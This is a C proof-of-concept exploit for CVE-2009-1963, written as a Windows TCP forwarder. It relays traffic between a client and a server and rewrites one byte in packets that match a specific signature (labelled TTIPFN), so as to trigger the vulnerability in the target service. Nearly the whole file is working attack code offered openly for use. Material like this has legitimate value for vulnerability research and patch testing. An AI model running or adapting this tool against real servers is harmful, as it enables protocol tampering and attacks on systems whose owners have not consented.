// PoC for CVE-2009-1963
// discovered by Dennis Yurichev <dennis@conus.info>

// for more information: http://blogs.conus.info/node/25

// run: tcp_fwd <IP to bind on> <TCP port port to listen> <IP to connect on> <TCP port to connect on>

#include <winsock2.h>
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <assert.h>

void main(int argc, char * argv[])
{
  WSADATA wsaData;
  int iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
  SOCKET ListenSocket;
  SOCKET AcceptSocket;

  int port_in, port_out;

  printf ("simple TCP forwarder.\nusage: .exe <IP to bind on> <TCP port port to listen> <IP to connect on> <TCP port to connect on>\n");

  assert (argv[1]!=NULL);
  assert (argv[2]!=NULL);
  assert (argv[3]!=NULL);
  assert (argv[4]!=NULL);

  assert (sscanf (argv[2], "%d", &port_in)==1);
  assert (sscanf (argv[4], "%d", &port_out)==1);

  assert (iResult == NO_ERROR);

  ListenSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

  assert (ListenSocket != INVALID_SOCKET);

  sockaddr_in service;
  service.sin_family = AF_INET;
  service.sin_addr.s_addr = inet_addr(argv[1]);
  service.sin_port = htons(port_in);

  assert (bind (ListenSocket, (SOCKADDR*) &service, sizeof(service)) != SOCKET_ERROR);

  assert (listen( ListenSocket, SOMAXCONN ) != SOCKET_ERROR);

  printf ("we are listening. press Ctrl-C to exit.\n");

  for (;;)
    {
      int sent;
      char *buf;
      struct hostent *hp=gethostbyname (argv[3]);
      struct sockaddr_in sin;
      SOCKET serv;
      int cycle;

      assert (hp!=NULL);

      buf=(char*)malloc(60000);

      AcceptSocket = accept(ListenSocket, NULL, NULL);

      assert (AcceptSocket!=SOCKET_ERROR);

      printf ("client appeared\n");

      serv=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
      assert (serv!=INVALID_SOCKET);

      sin.sin_family=AF_INET;
      sin.sin_port=htons(port_out);
      memcpy(&sin.sin_addr, hp->h_addr, hp->h_length);

      connect(serv, (struct sockaddr *)&sin, sizeof(sin));
      printf ("connected to serv\n");

      cycle=0;

      for (;;)
	{
	  int r;
	  struct timeval t;
	  fd_set fd_serv;
	  fd_set fd_client;
	  
	  t.tv_sec=0;
	  t.tv_usec=100000; // 10ms
	  
	  FD_ZERO(&fd_serv);
	  FD_SET(serv, &fd_serv);

	  FD_ZERO(&fd_client);
	  FD_SET(AcceptSocket, &fd_client);

	  cycle++;

	  if (select (0, &fd_client, 0, 0, &t))
	    {
	      r=recv (AcceptSocket, buf, 60000, 0);

	      if (r==-1 || r==0)
		{
		  printf ("r==-1 while reading from client\n");
		  break;
		};

	      if (buf[0xA]==0x11 && r==229) // TTIPFN, that's our packet
		{
		  printf ("TTIPFN from client, we modify it.\n");

                  buf[4]=0xF;
                };
                  
	      send (serv, buf, r, 0);

	      printf ("%d bytes from client to serv\n", r);
	      cycle=0;
	    };

	  if (select (0, &fd_serv, 0, 0, &t))
	    {
	      r=recv (serv, buf, 60000, 0);
	      if (r==-1 || r==0)
		{
		  printf ("r==%08X whlie reading from serv\n", r);
		  break;
		};
	      send (AcceptSocket, buf, r, 0);
	      printf ("%d bytes from serv to client\n", r);
	      cycle=0;
	    };

	  if (cycle>20)
	    {
	      printf ("timeout!\n");
	      break;
	    };
	};

      printf ("closing both sockets\n");
      closesocket (AcceptSocket);
      closesocket (serv);
    };
};
